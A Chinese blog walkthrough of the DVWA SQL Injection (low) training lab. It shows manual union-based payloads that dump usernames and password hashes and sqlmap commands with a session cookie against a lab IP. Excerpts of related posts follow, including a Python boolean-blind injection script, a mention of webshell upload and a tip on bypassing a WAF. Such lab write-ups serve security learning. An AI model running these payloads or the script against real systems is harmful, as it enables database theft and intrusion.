DVWA -SQL Injection (low)

最新推荐文章于 2025-07-07 08:50:54 发布
原创 最新推荐文章于 2025-07-07 08:50:54 发布 · 342 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了DVWA中SQL Injection(low)级别的手工注入和使用sqlmap工具进行注入的详细步骤。包括判断注入类型、猜测字段数、获取用户信息、表名、字段名和字段值等,并演示了sqlmap如何探测注入点、枚举数据库、表、列及转储数据。

low级别(手工注入 和 sqlmap工具注入)
**

手动注入

**

1.判断是否存在注入,注入的类型是字符型还是数字型
输入1:(输入1-5都会返回正确的值)在这里插入图片描述
输入 1’(发现报错,存在注入漏洞)

在这里插入图片描述

Id是被’ ‘包括起来的,是属于字符型注入

闭合 输入 1’ and ‘1’=’1(查询成功,会返回正确的值)
在这里插入图片描述
输入1’ or ‘1’=’1 时,因为这个式子是永真的,返回了所有结果。

在这里插入图片描述

2.猜测sql查询语句中的字段数
1’ order by 3#
在这里插入图片描述
1’ order by 2#
在这里插入图片描述

3.确定显示的字段顺序

0’ union select 1,2#
在这里插入图片描述

4.获取当前用户,数据库,版本号
0’ union select 1,concat(user(),database(),version())#

在这里插入图片描述

5.获取表名
0’ union select 1, group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#
在这里插入图片描述
6.获取字段名
0’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#
在这里插入图片描述

7.获取字段值
0’ union select 1,group_concat(user,0x3a,password) from users#
在这里插入图片描述
在这里插入图片描述
**

sqlmap工具注入

**

用到的参数
-u URL, --url=URL :指定URL
–cookie=COOKIE :HTTP Cookie header值
–dbs :枚举数据库管理系统数据库
–tables :枚举DBMS数据库中的表
–columns :枚举DBMS数据库表列
-D DB :要进行枚举的指定数据库名
-T TBL :DBMS数据库表枚举
-C COL :DBMS数据库表列枚举
–dump :z转储数据库表项

1.查看有无注入点
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
在这里插入图片描述
有一个302跳转,跳转到的是登录页面,所以这个时候需要用cookie进行会话维持,然后用burpsuite或者f12,找到cookie
在这里插入图片描述
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho”
在这里插入图片描述
在这里插入图片描述
存在注入

2.获取数据库名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” --dbs
在这里插入图片描述
3.获取dvwa数据库中表名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa --tables
在这里插入图片描述
4.获取dvwa数据库中users表中的字段名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --columns
在这里插入图片描述
5.获取user,password的值
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users -C user,password --dump
在这里插入图片描述
6.获取所有字段值
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --dump
在这里插入图片描述

DVWA--SQL注入(SQL Injection)--Low
JakeLin's Blog
06-15 535
SQL注入常规思路: 1、寻找注入点,可以通过 web 扫描工具实现 2、通过注入点,尝试获得关于连接数据库用户名、数据库名称、连接数据库用户权限、操作系统信息、数据库版本等相关信息。 3、猜解关键数据库表及其重要字段与内容(常见如存放管理员账户的表名、字段名等信息) 4、可以通过获得的用户信息,寻找后台登录。 5、利用后台或了解的进一步信息,上传 webshell 或向数据库写入一句话木马,以进一步提权,直到拿到服务器权限。 手工注入常规思路: 1.判断是否存在注入,注入是字符型还是...
DVWA】1.SQL Injection通关记录(Low
Zichel77的博客
10-21 448
Security Level:Low 1.判断注入点及注入类型 看到的是一个输入框,输入数字有对应返回值 所以这里应该是一个注入点,使用恒真恒假式来尝试一下 输入1' and '1'='2返回无结果,确定此处为注入点 再用恒真式来显示所有结果 输入1' or '1'='1('1'='1'恒真,中间使用or连接则整个查询式子恒真,即可返回所有查询结果) 2.判断数据库中的字段数 ...
DVWA(7)SQL注入(SQL InjectionLOW-HIGHT 操作记录
lllllaaa111的博客
11-08 498
今天带来第七期SQL注入操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的。
DVWA SQL Injection LOW
weixin_34008784的博客
11-26 229
最近在学习SQL注入,初出茅庐,就从dvwa开始吧 sql注入可以通过sqlmap工具实现,为了更好地了解原理,这里主要是手工注入 注入的一般流程为: 1,找到注入点,此步骤可通过工具 2,判断注入类型 3,判断列数,展示位 4,利用函数获取数据库用户,版本号,数据库名等信息 5,联合注入法利用information_schema数据库中存储所有的表...
DVWA——SQL Injection(low)
分享简单的安全技术
01-06 335
SQL Injection 界面 源代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS[
DVWA-SQL Injection模块展开实验
weixin_52363821的博客
05-06 810
SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。
DVWA-SQL Injection 全级别教程
weixin_44716769的博客
09-08 745
SQL Injection 实验准备 Low 判断是否存在注入,注入是字符型还是数字型 当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。 输入1,查询成功 输入1’ and ‘1’ ='2,查询失败,返回结果为空。说明不存在数字型注入漏洞 输入1’ or ‘1234’='1234,查询成功。说明存在字符型注入 猜SQL查询语句中的字段数 输入1’ or 1=1 order by 1 #,查询成功 #是注释作用 输入
DVWA-SQL Injection(Blind盲注)
Cwillchris的博客
10-28 1176
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: SQLInjection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入 攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 盲注分为基于布尔的盲注、基于时间的盲注以及基于报错.
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1869
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
DVWA靶场-SQL InjectionSQL注入
mlws1900的博客
03-18 774
就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。函数用于对用户输入的id进行转义,以防止恶意SQL代码被插入到SQL查询语句中。通过使用这个函数,特殊字符(如单引号)将被转义,从而使输入的数据变得安全,并且不会破坏SQL查询语句的结构。
DVWA——SQL Injection(LOW)
qq_54448882的博客
11-05 3451
此文章仅供学习使用,请勿用作违法行为。 目录 注入的前提条件 基本思路 1.判断是否存在注入点,以及注入的类型(字符型/数字型) 2.猜解SQL查询语句中的字段数和字段顺序 3.确定回显点 4.获取当前数据库 5.获取数据库中的表 6.获取表中字段名 7.获取字段中的数据(此时已可以成功获取数据库内容) 注入的前提条件: 参数用户可控:用户可以控制前端传入后端的参数内容 参数可带入数据库进行查询:用户传入的参数可以直接拼接到数据库的SQL语句,且带入数据库查询。 基本思路:
DVWA-SQL Injection(low)
七月_的博客
10-21 460
文章目录安装dvwa下载、安装PhpStudy下载、存放DVWA配置DVWA环境创建数据库出错成功登录LowSQL Injection:(1)判断(2)用order by判断列数(3)注入出当前数据库所有的表名(4)注入出某一个表中的全部列名(5)注入出字段内容low SQL Injection源码 安装dvwa 下载、安装PhpStudy 下载地址传送门:https://www.xp.cn/do...
【渗透测试】【Sqlmap】DVWA-SQL Injectionlow)
preserphy的博客
07-05 474
①进入sqlmap目录,使用-u命令访问地址:python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#"发现跳转到302了,被重定向了,所以这样不行…又回到浏览器页面看了一下请求,发现里面有cookie,所以我们要把相应的cookie加上。②使用--cookie命令加...
DVWA - SQL - Injectionlow
m0_62102000的博客
09-16 236
DVWA - SQL - Injectionlow
SQL injection on DVWA (Low Level)
312小公举的专栏
05-12 1215
首先看看输入正常的ID得到什么结果: 当输入1‘ 时: 说明了这个id的类型是个string,数据库是MySQL 当输入1’ and '1'='1时,and后面的1=1是个永真式: 当输入1‘ or '1'='1是,这个式子是个永真式,返回所有结果: 确定数据表的列数: 输入' union select 1,2 --'
SQL Injection——low低级别
用博客做做记录的小白
06-06 240
DVWA靶场sql注入关卡低级难度
DVWA靶场通关笔记-SQL注入(SQL Injection low级别)
最新发布
mooyuan的网络安全博客
07-07 891
DVWA(Damn Vulnerable Web Application)中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWA sql injection low
weixin_43345082的博客
06-12 310
Dvwa Low 1 1’ 1 and 1=1 1 and 1=2 select First name的列名 and Surname的列名from 表名 where id的列名 =‘我们输入的id’ 那么我们首先爆出它的库试试,用单引号让id闭合 内置查询函数version()  user()  database()  @@version_compile_os 输入 1’ union select...
小记一次DVWA靶场中SQL注入
ranuy阮的博客
02-25 898
0x01 环境介绍 DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 0x02 测试过程 low级别,关于mysql日志 查询是否启用日志 mysql>show variables like ‘log_%’; MySQL有以下几种日志: 错误日志: -log-err 查询日志: -log 慢查询日...
利用手工的方式对DVWA -SQL Injection (Blind)进行布尔盲注注入,获取表名
06-14
### 布尔盲注手工注入获取表名教程 布尔盲注是一种通过观察页面返回结果是否发生变化来判断注入点是否存在漏洞的方法。在DVWASQL Injection (Blind)模块中,可以通过构造特定的SQL语句,结合布尔条件判断数据库中的表名。 以下是一个完整的布尔盲注手工注入流程,用于获取DVWASQL Injection (Blind)模块的表名: #### 1. 确定注入点 首先需要确认目标参数(如`id`)是否可以进行布尔盲注。可以通过简单的SQL语法测试,例如: ``` http://dvwa/vulnerabilities/sqli_blind/?id=1' AND '1'='1&Submit=Submit# ``` 如果页面正常显示内容,则说明`AND '1'='1`条件为真;尝试: ``` http://dvwa/vulnerabilities/sqli_blind/?id=1' AND '1'='2&Submit=Submit# ``` 如果页面内容发生变化(如无数据返回),则说明`AND '1'='2`条件为假。这表明注入点存在漏洞[^1]。 #### 2. 获取数据库名 在确定注入点后,可以进一步测试数据库名。假设已知数据库名为`dvwa`,可以通过以下语句验证: ``` http://dvwa/vulnerabilities/sqli_blind/?id=1' AND database()='dvwa' --+&Submit=Submit# ``` 如果页面正常显示内容,则说明当前数据库名为`dvwa`。 #### 3. 枚举表名长度 为了获取表名,首先需要知道表名的长度。可以通过以下语句逐步枚举: ``` http://dvwa/vulnerabilities/sqli_blind/?id=1' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='dvwa' LIMIT 0,1))=N --+&Submit=Submit# ``` 将`N`从1开始递增,直到找到正确的表名长度。例如,如果表名长度为5,则上述语句中的`N`应为5时页面正常显示[^2]。 #### 4. 枚举表名字符 在确定表名长度后,可以逐个字符枚举表名。使用`SUBSTRING()`函数提取表名的每个字符,并结合`ASCII()`函数将其转换为ASCII码值进行比较。例如: ``` http://dvwa/vulnerabilities/sqli_blind/?id=1' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='dvwa' LIMIT 0,1),1,1))=97 --+&Submit=Submit# ``` 上述语句中,`LIMIT 0,1`表示获取第一个表名,`SUBSTRING(...,1,1)`提取表名的第一个字符,`ASCII(...)=97`判断该字符是否为`a`(ASCII码值为97)。通过不断调整字符位置和ASCII码值,可以逐步拼出完整表名[^3]。 #### 5. 获取所有表名 重复步骤3和步骤4,通过修改`LIMIT`参数获取不同表名。例如: ``` http://dvwa/vulnerabilities/sqli_blind/?id=1' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='dvwa' LIMIT 1,1),1,1))=98 --+&Submit=Submit# ``` 上述语句中的`LIMIT 1,1`表示获取第二个表名。 #### 示例代码 以下是基于布尔盲注的手工注入流程示例: ```python import requests url = "http://dvwa/vulnerabilities/sqli_blind/" cookies = {"PHPSESSID": "your_session_id", "security": "low"} payload_template = "?id=1' AND {} --+" # 检查表名长度 def check_table_length(limit): for length in range(1, 50): # 假设表名长度不超过50 payload = payload_template.format(f"LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='dvwa' LIMIT {limit},1))={length}") response = requests.get(url + payload, cookies=cookies) if "User ID exists in the database." in response.text: return length return None # 枚举表名字符 def get_table_name(limit, length): table_name = "" for i in range(1, length + 1): for char_code in range(32, 127): # ASCII可打印字符范围 payload = payload_template.format(f"ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='dvwa' LIMIT {limit},1),{i},1))={char_code}") response = requests.get(url + payload, cookies=cookies) if "User ID exists in the database." in response.text: table_name += chr(char_code) break return table_name # 主程序 for limit in range(3): # 获取前3个表名 length = check_table_length(limit) if length: table_name = get_table_name(limit, length) print(f"Table Name: {table_name}") ``` ### 注意事项 - 在实际操作中,需要根据目标环境调整SQL语句。 - 如果目标系统启用了WAF或安全机制,可能需要对注入语句进行编码或变形以绕过检测。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值